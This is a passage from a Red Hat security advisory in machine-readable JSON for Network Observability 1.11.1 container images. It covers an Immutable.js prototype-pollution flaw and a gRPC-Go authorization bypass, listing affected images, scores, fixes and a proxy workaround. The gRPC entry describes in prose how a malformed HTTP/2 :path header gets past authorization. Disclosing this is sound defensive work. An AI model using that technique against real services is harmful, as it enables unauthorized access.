"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-29063"
},
{
"category": "external",
"summary": "RHBZ#2445291",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-29063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw",
"url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
}
],
"release_date": "2026-03-06T18:25:22.438000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution"
},
{
"cve": "CVE-2026-33186",
"cwe": {
"id": "CWE-551",
"name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
},
"discovery_date": "2026-03-20T23:02:27.802640+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2449833"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in gRPC-Go, the Go language implementation of gRPC. This vulnerability, an authorization bypass, is caused by improper input validation of the HTTP/2 `:path` pseudo-header. A remote attacker can exploit this by sending raw HTTP/2 frames with a malformed `:path` that omits the mandatory leading slash. This allows the attacker to bypass defined security policies, potentially leading to unauthorized access to services or information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "google.golang.org/grpc/grpc-go: google.golang.org/grpc/authz: gRPC-Go: Authorization bypass due to improper HTTP/2 path validation",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"known_not_affected": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-operator-bundle@sha256:325f2d9688ef540088f75b450d209fb8dd6b7b2dfc006f492f7575f3e8678607_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33186"
},
{
"category": "external",
"summary": "RHBZ#2449833",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449833"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33186",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33186"
},
{
"category": "external",
"summary": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3",
"url": "https://github.com/grpc/grpc-go/security/advisories/GHSA-p77j-4mvh-x3m3"
}
],
"release_date": "2026-03-20T22:23:32.147000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-02T07:50:38+00:00",
"details": "For details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:7e2463af3ff443c98adf0bbfe349c7d9da90c8de34892e41b46627f30623b47a_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:a72d7f075a569e1c0ba055ca748f04fa3c6ff889de498faba215174048b9b088_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:13ea96ec33fe631eea4970b4d05aaebb101d1e964047cc3cdd8e659eb1329122_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:4a717354ce0dfefb859c61b6088f9e51c9e1679892359ddcbe250697e723618d_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:b5778b60be17f7e849b5aff93df89735063e003c27c61bc03abd4b899542a7ae_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-rhel9-operator@sha256:dc14db47fce0af17e02916369099477a584d52e113e20b47518007aa074b5453_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6428"
},
{
"category": "workaround",
"details": "To mitigate this issue, implement infrastructure-level normalization to ensure all incoming HTTP/2 `:path` headers are properly formatted with a leading slash before reaching the gRPC-Go server. This can be achieved by configuring a reverse proxy or API gateway to validate and normalize the `:path` header. Ensure that any such intermediary is properly configured and restarted to apply the changes, which may temporarily impact service availability.",
"product_ids": [
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:05ced6a12abb5c6156d57cde83a5515f1ba1ae4b4876c20df8e87acf658b55cd_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:30a1eceb88756d6bd6b2a523f4c763e2c17491d921e709b49065c8e1827e7e40_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:a90dd2247b3167d97fae23047e0dadb711b870a402fb6ae1460928e187a4a1f3_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-cli-rhel9@sha256:b0f982a4b0cf36578c2483d9487e6c6f0343043737e01b6dd1b61778ed915e80_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:03f45691cb47a4afd19a4bb61704f1c38cc6f0fb9f7bcacf4ed3070eecdc02b4_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:115254a3a9f613fbcec875c7e515b638da1e046f6dff8bcb0ce8aeb7bd3bcbb8_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:17faaf94edcd7636ece30fcc7372bdabdc66c5d443b1132c9a15ef6823f57175_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-compat-rhel9@sha256:40512734417b0b3555046f6034e20dc9d834819bb83dbc2e6240bd656a4b2b3b_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:1b0ed12930e073b9d9f10856abd1bf78366123a7c46d0365395ae9ffaccb8cd1_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:222e5ccbdcee7fcddfceda87216a63ea8aa46efdde0171fd1ba58b5c1e020768_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:3452169eaaeda28a490561e93089374a5e306868e221f68c14dc623de532f152_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-console-plugin-rhel9@sha256:51765514b5b6d1d205a26ad50893d11284256dd0afbd7603370c92242012973c_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:2f23661c41345f7e7625d961649fdc4432e5e9b546ca807dc50c1b685480d44f_amd64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:880119c62568c07d28fcedfe545b92cb6e4b9e11ffb79f8405214a4810f931f8_s390x",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:9d6bc518588793ff607a20fd94a181c7028c1f7a938b713253bfddef3fbac708_ppc64le",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-ebpf-agent-rhel9@sha256:dc9c1e367526c7a2bae9694c253909f6716be82f89d1ceb9dc3a38528120d518_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:5218256abd119c47e49511a207521013f4e70873f5e1695cd33c7acb236167a3_arm64",
"Network Observability (NETOBSERV) 1.11.1:registry.redhat.io/network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:791b6dff77ede837fe03220d73511632b719e3c9668ef1a4a7766c2c9c8fe4b4_ppc64le",
